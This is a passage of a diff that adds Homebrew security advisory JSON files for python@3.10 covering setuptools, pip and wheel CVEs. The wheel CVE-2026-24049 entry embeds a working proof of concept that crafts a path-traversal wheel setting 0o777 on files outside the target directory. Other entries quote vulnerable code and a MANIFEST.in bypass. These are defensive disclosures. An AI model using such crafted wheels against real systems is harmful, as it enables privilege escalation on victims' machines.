"type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00028.html" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ" + }, + { + "type": "WEB", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2024-6345.json b/advisories/BREW-python@3.10-CVE-2024-6345.json new file mode 100644 index 00000000000..4c2413e346c --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2024-6345.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2024-6345", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-cx63-2mw6-8hw5", + "BIT-setuptools-2024-6345", + "CVE-2024-6345", + "PYSEC-2026-1918" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "70.0.0", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@84.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools vulnerable to Command Injection via package URL", + "details": "A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/pull/4332" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2025-47273.json b/advisories/BREW-python@3.10-CVE-2025-47273.json new file mode 100644 index 00000000000..8455c0c624f --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2025-47273.json @@ -0,0 +1,106 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2025-47273", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-5rjg-fvgr-3xxf", + "BIT-setuptools-2025-47273", + "CVE-2025-47273", + "PYSEC-2025-49" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "78.1.1", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@84.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools has a path traversal vulnerability in PackageIndex.download that leads to Arbitrary File Write", + "details": "### Summary \nA path traversal vulnerability in `PackageIndex` was fixed in setuptools version 78.1.1\n\n### Details\n```\n def _download_url(self, url, tmpdir):\n # Determine download filename\n #\n name, _fragment = egg_info_for_url(url)\n if name:\n while '..' in name:\n name = name.replace('..', '.').replace('\\\\', '_')\n else:\n name = \"__downloaded__\" # default if URL has no path contents\n\n if name.endswith('.[egg.zip](http://egg.zip/)'):\n name = name[:-4] # strip the extra .zip before download\n\n --> filename = os.path.join(tmpdir, name)\n```\n\nHere: https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88\n\n`os.path.join()` discards the first argument `tmpdir` if the second begins with a slash or drive letter.\n`name` is derived from a URL without sufficient sanitization. While there is some attempt to sanitize by replacing instances of '..' with '.', it is insufficient.\n\n### Risk Assessment\nAs easy_install and package_index are deprecated, the exploitation surface is reduced.\nHowever, it seems this could be exploited in a similar fashion like https://github.com/advisories/GHSA-r9hx-vwmv-q579, and as described by POC 4 in https://github.com/advisories/GHSA-cx63-2mw6-8hw5 report: via malicious URLs present on the pages of a package index.\n\n### Impact\nAn attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to RCE depending on the context.\n\n### References\nhttps://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5\nhttps://github.com/pypa/setuptools/issues/4946", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47273" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/issues/4946" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2025-49.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/blob/6ead555c5fb29bc57fe6105b1bffc163f56fd558/setuptools/package_index.py#L810C1-L825C88" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00035.html" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2025-8869.json b/advisories/BREW-python@3.10-CVE-2025-8869.json new file mode 100644 index 00000000000..6b6ed2fd85b --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2025-8869.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2025-8869", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-4xh5-x5gv-qwph", + "CVE-2025-8869", + "PYSEC-2026-1795" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "25.3", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "pip's fallback tar extraction doesn't check symbolic links point to extraction directory", + "details": "When extracting a tar archive pip may not check symbolic links point into the extraction directory if the tarfile module doesn't implement PEP 706. Note that upgrading pip to a \"fixed\" version for this vulnerability doesn't fix all known vulnerabilities that are remediated by using a Python version that implements PEP 706. Note that this is a vulnerability in pip's fallback implementation of tar extraction for Python versions that don't implement PEP 706 and therefore are not secure to all vulnerabilities in the Python 'tarfile' module. If you're using a Python version that implements PEP 706 then pip doesn't use the \"vulnerable\" fallback code. Mitigations include upgrading to a version of pip that includes the fix, upgrading to a Python version that implements PEP 706 (Python >=3.9.17, >=3.10.12, >=3.11.4, or >=3.12), applying the linked patch, or inspecting source distributions (sdists) before installation as is already a best-practice.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8869" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/13550" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/f2b92314da012b9fffa36b3f3e67748a37ef464a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00028.html" + }, + { + "type": "WEB", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IF5A3GCJY3VH7BVHJKOWOJFKTW7VFQEN" + }, + { + "type": "WEB", + "url": "https://pip.pypa.io/en/stable/news/#v25-2" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-1703.json b/advisories/BREW-python@3.10-CVE-2026-1703.json new file mode 100644 index 00000000000..c68e2ccff5b --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-1703.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-1703", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-6vgw-5pg2-w6jp", + "CVE-2026-1703", + "PYSEC-2026-1796" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.0", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "pip Path Traversal vulnerability", + "details": "When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical situations.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1703" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/13777" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/8e227a9be4faa9594e05d02ca05a413a2a4e7735" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WIEA34D4TABF2UNQJAOMXKCICSPBE2DJ" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-24049.json b/advisories/BREW-python@3.10-CVE-2026-24049.json new file mode 100644 index 00000000000..dfbeeaee508 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-24049.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-24049", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-8rrh-rw8j-w5fx", + "CVE-2026-24049", + "PYSEC-2026-2047" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.46.2", + "resource": "wheel", + "resource_purl": "pkg:pypi/wheel@0.48.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "wheel", + "subject_version": "0.48.0", + "key": "pkg:pypi/wheel@0.48.0", + "resource": "wheel" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "wheel", + "subject_version": "0.48.0", + "key": "pkg:pypi/wheel@0.48.0", + "resource": "wheel" + } + ] + }, + "summary": "Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack", + "details": "### Summary\n - **Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. \n - **Root Cause Component:** wheel.cli.unpack.unpack function. \n - **Affected Packages:** \n 1. wheel (Upstream source) \n 2. setuptools (Downstream, vendors wheel) \n - **Severity:** High (Allows modifying system file permissions). \n\n### Details \nThe vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. \n```\n# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)\nfor zinfo in wf.filelist:\n wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile\n\n # (2) VULNERABILITY:\n # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.\n # If zinfo.filename contains \"../\", this targets files outside the destination.\n permissions = zinfo.external_attr >> 16 & 0o777\n destination.joinpath(zinfo.filename).chmod(permissions)\n``` \n\n### PoC \nI have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. \n\n**Prerequisites:** pip install setuptools \n\n**Step 1: Generate the Malicious Wheel (gen_poc.py)** \nThis script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. \n```\nimport zipfile\nimport hashlib\nimport base64\nimport os\n\ndef urlsafe_b64encode(data):\n \"\"\"\n Helper function to encode data using URL-safe Base64 without padding.\n Required by the Wheel file format specification.\n \"\"\"\n return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')\n\ndef get_hash_and_size(data_bytes):\n \"\"\"\n Calculates SHA-256 hash and size of the data.\n These values are required to construct a valid 'RECORD' file,\n which is used by the 'wheel' library to verify integrity.\n \"\"\"\n digest = hashlib.sha256(data_bytes).digest()\n hash_str = \"sha256=\" + urlsafe_b64encode(digest)\n return hash_str, str(len(data_bytes))\n\ndef create_evil_wheel_v4(filename=\"evil-1.0-py3-none-any.whl\"):\n print(f\"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}\")\n\n # 1. Prepare Standard Metadata Content\n # These are minimal required contents to make the wheel look legitimate.\n wheel_content = b\"Wheel-Version: 1.0\\nGenerator: bdist_wheel (0.37.1)\\nRoot-Is-Purelib: true\\nTag: py3-none-any\\n\"\n metadata_content = b\"Metadata-Version: 2.1\\nName: evil\\nVersion: 1.0\\nSummary: PoC Package\\n\"\n \n # 2. Define Malicious Payload (Path Traversal)\n # The content doesn't matter, but the path does.\n payload_content = b\"PWNED by Path Traversal\"\n\n # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'\n # The vulnerability allows 'chmod' to affect this path directly.\n malicious_path = \"../../poc_target.txt\"\n\n # 3. Calculate Hashes for Integrity Check Bypass\n # The 'wheel' library verifies if the file hash matches the RECORD entry.\n # To bypass this check, we calculate the correct hash for our malicious file.\n wheel_hash, wheel_size = get_hash_and_size(wheel_content)\n metadata_hash, metadata_size = get_hash_and_size(metadata_content)\n payload_hash, payload_size = get_hash_and_size(payload_content)\n\n # 4. Construct the 'RECORD' File\n # The RECORD file lists all files in the wheel with their hashes.\n # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.\n # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.\n record_lines = [\n f\"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}\",\n f\"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}\",\n f\"{malicious_path},{payload_hash},{payload_size}\", # <-- Authenticating the malicious path\n \"evil-1.0.dist-info/RECORD,,\"\n ]\n record_content = \"\\n\".join(record_lines).encode('utf-8')\n\n # 5. Build the Zip File\n with zipfile.ZipFile(filename, \"w\") as zf:\n # Write standard metadata files\n zf.writestr(\"evil-1.0.dist-info/WHEEL\", wheel_content)\n zf.writestr(\"evil-1.0.dist-info/METADATA\", metadata_content)\n zf.writestr(\"evil-1.0.dist-info/RECORD\", record_content)\n\n # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file\n # We need to set specific permission bits to trigger the vulnerability.\n zinfo = zipfile.ZipInfo(malicious_path)\n \n # Set external attributes to 0o777 (rwxrwxrwx)\n # Upper 16 bits: File type (0o100000 = Regular File)\n # Lower 16 bits: Permissions (0o777 = World Writable)\n # The vulnerable 'unpack' function will blindly apply this '777' to the system file.\n zinfo.external_attr = (0o100000 | 0o777) << 16\n \n zf.writestr(zinfo, payload_content)\n\n print(\"[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.\")\n\nif __name__ == \"__main__\":\n create_evil_wheel_v4()\n``` \n\n**Step 2: Run the Exploit (exploit.py)** \n```\nfrom pathlib import Path\nimport sys\n\n# Demonstrating impact on setuptools\ntry:\n from setuptools._vendor.wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from setuptools\")\nexcept ImportError:\n from wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from wheel\")\n\n# 1. Setup Target (Read-Only system file simulation)\ntarget = Path(\"poc_target.txt\")\ntarget.write_text(\"SENSITIVE CONFIG\")\ntarget.chmod(0o400) # Read-only\nprint(f\"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}\")\n\n# 2. Run Vulnerable Unpack\n# The wheel contains \"../../poc_target.txt\".\n# unpack() will extract safely, BUT chmod() will hit the actual target file.\ntry:\n unpack(\"evil-1.0-py3-none-any.whl\", \"unpack_dest\")\nexcept Exception as e:\n print(f\"[!] Ignored expected extraction error: {e}\")\n\n# 3. Check Result\nfinal_perms = oct(target.stat().st_mode)[-3:]\nprint(f\"[*] Final Perms: {final_perms}\")\n\nif final_perms == \"777\":\n print(\"VULNERABILITY CONFIRMED: Target file is now world-writable (777)!\")\nelse:\n print(\"[-] Attack failed.\")\n``` \n\n**result:** \n\"image\" \n \n### Impact \nAttackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. \n\n### Recommended Fix \nThe unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). \n\n### Suggested Patch: \n```\n# extract() returns the actual path where the file was written\nextracted_path = wf.extract(zinfo, destination)\n\n# Only apply chmod if a file was actually written\nif extracted_path:\n permissions = zinfo.external_attr >> 16 & 0o777\n Path(extracted_path).chmod(permissions)\n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/wheel" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/wheel/releases/tag/0.46.2" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-3219.json b/advisories/BREW-python@3.10-CVE-2026-3219.json new file mode 100644 index 00000000000..3b4671ff80b --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-3219.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-3219", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-58qw-9mgm-455v", + "CVE-2026-3219", + "PYSEC-2026-2875" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "26.1", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "pip has an interpretation conflict due to handling both concatenated tar and ZIP files as ZIP files", + "details": "pip handles concatenated tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. This behavior could result in confusing installation behavior, such as installing \"incorrect\" files according to the filename of the archive. New behavior only proceeds with installation if the file identifies uniquely as a ZIP or tar archive, not as both.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3219" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/issues/13867" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/13870" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/04/20/8" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-59890.json b/advisories/BREW-python@3.10-CVE-2026-59890.json new file mode 100644 index 00000000000..65c00477ca8 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2026-59890.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2026-59890", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-h35f-9h28-mq5c", + "BIT-setuptools-2026-59890", + "CVE-2026-59890", + "PYSEC-2026-3447" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "83.0.0", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@84.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools: MANIFEST.in exclusion bypass in sdist via Unicode normalization collision (NFC/NFD) on macOS APFS/HFS+", + "details": "## Summary\n\nWhen building a source distribution (`python -m build --sdist` / `setup.py sdist`), setuptools' `FileList` applies `MANIFEST.in` directives (`exclude`, `global-exclude`, `recursive-exclude`, `prune`) by matching a compiled glob against on-disk file names **byte-for-byte, with no Unicode normalization**. On normalization-preserving filesystems (notably macOS APFS and HFS+), a file written in NFD and a `MANIFEST.in` rule written in NFC refer to the same file but are byte-distinct, so the exclusion silently fails to match. A file the maintainer intended to exclude is then packed into the `.tar.gz` and, if published, uploaded to the public, immutable PyPI index.\n\n## Details\n\nFile names in `FileList.files` come from `os.walk` (`setuptools/_distutils/filelist.py`, `_find_all_simple`), so on APFS a file written NFD is offered to the matcher in NFD, while the `MANIFEST.in` pattern carries the author's editor form (typically NFC). The matching path performs no canonicalization:\n\n```python\n# setuptools/command/egg_info.py (FileList.global_exclude)\ndef global_exclude(self, pattern):\n match = translate_pattern(os.path.join('**', pattern)) # fnmatch.translate -> regex, no NFC/NFD\n return self._remove_files(match.match) # byte-level regex over raw os.walk names\n```\n\nA rule written NFC (`café` = `63 61 66 c3 a9`) does not match an on-disk name written NFD (`café` = `63 61 66 65 cc 81`), even though the filesystem treats the two as one file.\n\nA `unicodedata.normalize('NFD', ...)` helper exists in `setuptools/unicode_utils.py` (`decompose()`), but it is **never called in the manifest matching path**, so neither the pattern nor the walked path is normalized before matching. The only normalization in this area, `EggInfoCommand._manifest_normalize`, uses `filesys_decode` (bytes→str decode only, no NFC/NFD) and runs when writing `SOURCES.txt`, after matching has already occurred.\n\n## Impact\n\n`MANIFEST.in` exclusions are the documented mechanism maintainers use to keep secrets, local configs, and private fixtures out of the published sdist. A non-ASCII excluded file may be published to the public, immutable PyPI index despite the rule — an irreversible disclosure with no visual cue (NFC and NFD forms render identically). Exposure is filesystem-dependent and most relevant on macOS APFS/HFS+, where many maintainers build and publish. Pure-ASCII rules are unaffected.\n\n## Proof of concept\n\nWith a project containing `MANIFEST.in`:\n\n```\nglobal-include *.txt *.json\nglobal-exclude secret_café.txt # rule saved NFC\n```\n\nand an on-disk file `secret_café.txt` written in NFD, `python -m build --sdist` packs the secret file into the resulting `.tar.gz`, while an ASCII control file excluded by the same directive is correctly dropped — isolating the bypass to the NFC-pattern vs. NFD-name mismatch. Reproduced on macOS APFS with setuptools 82.0.1.\n\n## Remediation\n\nNormalize both the walked path and each `MANIFEST.in` pattern to a single canonical form before matching, in both `setuptools/command/egg_info.py` (`FileList`) and the vendored `setuptools/_distutils/filelist.py`. For an exclusion list, err toward excluding more, and document that `MANIFEST.in` matching is normalization-insensitive on macOS.\n\n## Credit\n\nReported by Tomas Illuminati. Coordinated via CERT/CC VINCE VU#604762.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/security/advisories/GHSA-h35f-9h28-mq5c" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59890" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/dd9f436a36486b4cb8a4c70a2321548b0be09b8f" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2026-3447.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/releases/tag/v83.0.0" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2026-6357.json 